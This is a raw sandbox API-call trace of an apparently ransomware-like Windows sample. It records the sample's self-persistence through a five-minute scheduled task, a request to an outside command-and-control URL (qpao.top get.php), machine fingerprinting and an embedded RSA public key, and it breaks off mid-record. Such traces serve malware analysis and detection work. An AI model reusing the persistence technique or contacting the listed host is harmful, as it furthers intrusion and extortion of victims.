[0123.822] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x329b6c8 | out: hHeap=0x31d0000) returned 1 [0123.822] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe") returned 1 [0123.822] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1cf30 [0123.822] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1ce68 | out: hHeap=0x31d0000) returned 1 [0123.822] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1ce68 [0123.822] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1cff8 [0123.822] CoInitialize (pvReserved=0x0) returned 0x0 [0123.859] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0123.860] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc0) returned 0x5e1d0c0 [0123.860] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18de24 | out: ppv=0x18de24*=0x31aff48) returned 0x0 [0123.871] TaskScheduler:ITaskService:Connect (This=0x31aff48, serverName=0x18d8b0*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x5f, varVal2=0xc0), user=0x18d8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xc8), domain=0x18d8d0*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), password=0x18d8e0*(varType=0x0, wReserved1=0x62d, wReserved2=0xddcc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x31d0000)) returned 0x0 [0123.874] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46c8 [0123.874] TaskScheduler:ITaskService:GetFolder (in: This=0x31aff48, Path="\\", ppFolder=0x18de2c | out: ppFolder=0x18de2c*=0x53908b8) returned 0x0 [0123.878] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46c8 | out: hHeap=0x31d0000) returned 1 [0123.878] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46c8 [0123.878] ITaskFolder:DeleteTask (This=0x53908b8, Name="Time Trigger Task", flags=0) returned 0x0 [0123.943] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46c8 | out: hHeap=0x31d0000) returned 1 [0123.943] TaskScheduler:ITaskService:NewTask (in: This=0x31aff48, flags=0x0, ppDefinition=0x18de30 | out: ppDefinition=0x18de30*=0x53908e8) returned 0x0 [0123.944] TaskScheduler:IUnknown:Release (This=0x31aff48) returned 0x1 [0123.944] ITaskDefinition:get_RegistrationInfo (in: This=0x53908e8, ppRegistrationInfo=0x18de04 | out: ppRegistrationInfo=0x18de04*=0x53909a8) returned 0x0 [0123.944] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.944] IRegistrationInfo:put_Author (This=0x53909a8, Author="Author Name") returned 0x0 [0123.944] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.944] IUnknown:Release (This=0x53909a8) returned 0x1 [0123.944] ITaskDefinition:get_Principal (in: This=0x53908e8, ppPrincipal=0x18de0c | out: ppPrincipal=0x18de0c*=0x5390b38) returned 0x0 [0123.944] IPrincipal:put_LogonType (This=0x5390b38, LogonType=3) returned 0x0 [0123.944] IUnknown:Release (This=0x5390b38) returned 0x1 [0123.944] ITaskDefinition:get_Settings (in: This=0x53908e8, ppSettings=0x18de14 | out: ppSettings=0x18de14*=0x5390a58) returned 0x0 [0123.945] ITaskSettings:put_StartWhenAvailable (This=0x5390a58, StartWhenAvailable=1) returned 0x0 [0123.945] IUnknown:Release (This=0x5390a58) returned 0x1 [0123.945] ITaskSettings:get_IdleSettings (in: This=0x5390a58, ppIdleSettings=0x18ddf8 | out: ppIdleSettings=0x18ddf8*=0x5390ac8) returned 0x0 [0123.945] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.945] IIdleSettings:put_WaitTimeout (This=0x5390ac8, WaitTimeout="PT5M") returned 0x0 [0123.945] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.945] IUnknown:Release (This=0x5390ac8) returned 0x1 [0123.945] ITaskDefinition:get_Triggers (in: This=0x53908e8, ppTriggers=0x18ddf4 | out: ppTriggers=0x18ddf4*=0x5390a18) returned 0x0 [0123.945] ITriggerCollection:Create (in: This=0x5390a18, Type=1, ppTrigger=0x18de00 | out: ppTrigger=0x18de00*=0x5390b98) returned 0x0 [0123.945] IUnknown:Release (This=0x5390a18) returned 0x1 [0123.945] IUnknown:QueryInterface (in: This=0x5390b98, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18de1c | out: ppvObject=0x18de1c*=0x5390b98) returned 0x0 [0123.945] IUnknown:Release (This=0x5390b98) returned 0x2 [0123.945] ITrigger:get_Repetition (in: This=0x5390b98, ppRepeat=0x18de08 | out: ppRepeat=0x18de08*=0x5390be8) returned 0x0 [0123.946] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.946] IRepetitionPattern:put_Interval (This=0x5390be8, Interval="PT5M") returned 0x0 [0123.946] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.946] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.946] IRepetitionPattern:put_Duration (This=0x5390be8, Duration="") returned 0x0 [0123.946] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.946] ITrigger:put_Repetition (This=0x5390b98, Repetition=0x5390be8) returned 0x0 [0123.946] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.946] ITrigger:put_Id (This=0x5390b98, Id="Trigger1") returned 0x0 [0123.946] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.946] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.946] ITrigger:put_EndBoundary (This=0x5390b98, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0123.946] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.946] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d8dc | out: lpSystemTimeAsFileTime=0x18d8dc*(dwLowDateTime=0x554ac9d0, dwHighDateTime=0x1d6bf06)) [0123.946] GetLastError () returned 0x0 [0123.946] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x24) returned 0x62cf268 [0123.947] GetLastError () returned 0x0 [0123.947] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0123.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d844 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d844) returned 26 [0123.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d844 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d844) returned 26 [0123.949] GetLastError () returned 0x0 [0123.949] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x24) returned 0x62cf298 [0123.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x62cf298, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0123.949] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xa0) returned 0x32c2000 [0123.949] GetLastError () returned 0x0 [0123.950] ITrigger:put_StartBoundary (This=0x5390b98, StartBoundary="2020-11-20T17:29:56") returned 0x0 [0123.950] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.950] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d3f20 | out: hHeap=0x31d0000) returned 1 [0123.950] IUnknown:Release (This=0x5390b98) returned 0x1 [0123.950] ITaskDefinition:get_Actions (in: This=0x53908e8, ppActions=0x18de10 | out: ppActions=0x18de10*=0x5390960) returned 0x0 [0123.950] IActionCollection:Create (in: This=0x5390960, Type=0, ppAction=0x18ddfc | out: ppAction=0x18ddfc*=0x5390c30) returned 0x0 [0123.950] IUnknown:Release (This=0x5390960) returned 0x1 [0123.950] IUnknown:QueryInterface (in: This=0x5390c30, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18de18 | out: ppvObject=0x18de18*=0x5390c30) returned 0x0 [0123.950] IUnknown:Release (This=0x5390c30) returned 0x2 [0123.950] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.950] IExecAction:put_Path (This=0x5390c30, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe") returned 0x0 [0123.950] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.950] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.951] IExecAction:put_Arguments (This=0x5390c30, Arguments="--Task") returned 0x0 [0123.951] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0123.951] IUnknown:Release (This=0x5390c30) returned 0x1 [0123.951] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xc) returned 0x62b46f8 [0123.951] ITaskFolder:RegisterTaskDefinition (in: This=0x53908b8, Path="Time Trigger Task", pDefinition=0x53908e8, flags=6, UserId=0x18d8b8*(varType=0x0, wReserved1=0x62d, wReserved2=0xddcc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x31d0000), password=0x18d8c8*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), LogonType=3, sddl=0x18d8dc*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xc8), ppTask=0x18dde4 | out: ppTask=0x18dde4*=0x5390cb0) returned 0x0 [0124.015] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62b46f8 | out: hHeap=0x31d0000) returned 1 [0124.015] TaskScheduler:IUnknown:Release (This=0x53908b8) returned 0x0 [0124.015] TaskScheduler:IUnknown:Release (This=0x53908e8) returned 0x0 [0124.016] IUnknown:Release (This=0x5390cb0) returned 0x0 [0124.016] CoUninitialize () [0124.019] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1d0c0 | out: hHeap=0x31d0000) returned 1 [0124.019] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1cff8 | out: hHeap=0x31d0000) returned 1 [0124.019] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1ce68 | out: hHeap=0x31d0000) returned 1 [0124.019] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3224fe0 [0124.019] OpenServiceW (hSCManager=0x3224fe0, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e150e8 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d29d8 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d2c40 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d36f0 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d3958 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d3bc0 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x62d3e28 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e280d0 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e28338 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e285a0 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e28808 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e28a70 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e28cd8 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e28f40 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e291a8 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e29410 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e29678 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0xa0) returned 0x32c2000 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x110) returned 0x32273f8 [0124.020] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c2000 | out: hHeap=0x31d0000) returned 1 [0124.020] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x110) returned 0x5dfe3b8 [0124.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x63506e8, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0xa08) returned 0x578 [0124.309] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32273f8 | out: hHeap=0x31d0000) returned 1 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x62cf298 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e298e0 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e29b48 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e29db0 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2a018 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2a280 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2a4e8 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2a750 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2a9b8 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2ac20 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2ae88 [0124.309] lstrlenA (lpString="http://qpao.top/nddddhsspen6/get.php") returned 36 [0124.309] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x4a) returned 0x32acfb8 [0124.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e298e0, cbMultiByte=-1, lpWideCharStr=0x32acfb8, cchWideChar=37 | out: lpWideCharStr="http://qpao.top/nddddhsspen6/get.php") returned 37 [0124.310] lstrcatW (in: lpString1="", lpString2="http://qpao.top/nddddhsspen6/get.php" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.310] lstrlenA (lpString="") returned 0 [0124.310] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea31e0 [0124.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e29b48, cbMultiByte=-1, lpWideCharStr=0x5ea31e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.310] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.310] lstrlenA (lpString="") returned 0 [0124.310] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea31d0 [0124.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e29db0, cbMultiByte=-1, lpWideCharStr=0x5ea31d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.310] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.310] lstrlenA (lpString="") returned 0 [0124.310] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea31f0 [0124.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2a018, cbMultiByte=-1, lpWideCharStr=0x5ea31f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.310] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.310] lstrlenA (lpString="") returned 0 [0124.310] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea3210 [0124.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2a280, cbMultiByte=-1, lpWideCharStr=0x5ea3210, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.310] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.310] lstrlenA (lpString="") returned 0 [0124.310] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea3230 [0124.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2a4e8, cbMultiByte=-1, lpWideCharStr=0x5ea3230, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.310] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.310] lstrlenA (lpString="") returned 0 [0124.310] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea3240 [0124.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2a750, cbMultiByte=-1, lpWideCharStr=0x5ea3240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.310] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.311] lstrlenA (lpString="") returned 0 [0124.311] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea3220 [0124.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2a9b8, cbMultiByte=-1, lpWideCharStr=0x5ea3220, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.311] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.311] lstrlenA (lpString="") returned 0 [0124.311] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea3250 [0124.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2ac20, cbMultiByte=-1, lpWideCharStr=0x5ea3250, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.311] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.311] lstrlenA (lpString="") returned 0 [0124.311] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x2) returned 0x5ea3260 [0124.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e2ae88, cbMultiByte=-1, lpWideCharStr=0x5ea3260, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.311] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php", lpString2="" | out: lpString1="http://qpao.top/nddddhsspen6/get.php") returned="http://qpao.top/nddddhsspen6/get.php" [0124.311] lstrlenW (lpString="") returned 0 [0124.311] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x12) returned 0x31f6120 [0124.311] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x288) returned 0x62d4090 [0124.311] GetAdaptersInfo (in: AdapterInfo=0x62d4090, SizePointer=0x18ddfc | out: AdapterInfo=0x62d4090, SizePointer=0x18ddfc) returned 0x0 [0124.349] GetAdaptersInfo (in: AdapterInfo=0x62d4090, SizePointer=0x18ddfc | out: AdapterInfo=0x62d4090, SizePointer=0x18ddfc) returned 0x0 [0124.359] GetLastError () returned 0x0 [0124.360] GetLastError () returned 0x0 [0124.360] CryptAcquireContextW (in: phProv=0x18ddcc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ddcc*=0x3231678) returned 1 [0124.362] CryptCreateHash (in: hProv=0x3231678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ddd4 | out: phHash=0x18ddd4) returned 1 [0124.362] CryptHashData (hHash=0x5e3e588, pbData=0x5ea3a78, dwDataLen=0x11, dwFlags=0x0) returned 1 [0124.362] CryptGetHashParam (in: hHash=0x5e3e588, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ddd0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ddd0) returned 1 [0124.362] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x11) returned 0x5e07db0 [0124.362] CryptGetHashParam (in: hHash=0x5e3e588, dwParam=0x2, pbData=0x5e07db0, pdwDataLen=0x18ddd0, dwFlags=0x0 | out: pbData=0x5e07db0, pdwDataLen=0x18ddd0) returned 1 [0124.362] GetLastError () returned 0x0 [0124.362] CryptDestroyHash (hHash=0x5e3e588) returned 1 [0124.362] CryptReleaseContext (hProv=0x3231678, dwFlags=0x0) returned 1 [0124.362] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3a78 | out: hHeap=0x31d0000) returned 1 [0124.362] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f4f0 [0124.362] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f4b8 | out: hHeap=0x31d0000) returned 1 [0124.362] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x3225080 | out: hHeap=0x31d0000) returned 1 [0124.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x1c4) returned 0x598 [0124.653] WaitForSingleObject (hHandle=0x598, dwMilliseconds=0xffffffff) returned 0x0 [0126.275] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x59c [0126.275] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x28) returned 0x62cf2f8 [0126.275] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2b0f0 [0126.275] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2b358 [0126.275] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2b5c0 [0126.275] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2b828 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2ba90 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e2bcf8 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e390c8 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e39330 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e39598 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x25c) returned 0x5e39800 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x3e0) returned 0x62d4090 [0126.276] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x5ea) returned 0x62c2c10 [0126.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x62c2c10, cbMultiByte=1514, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC 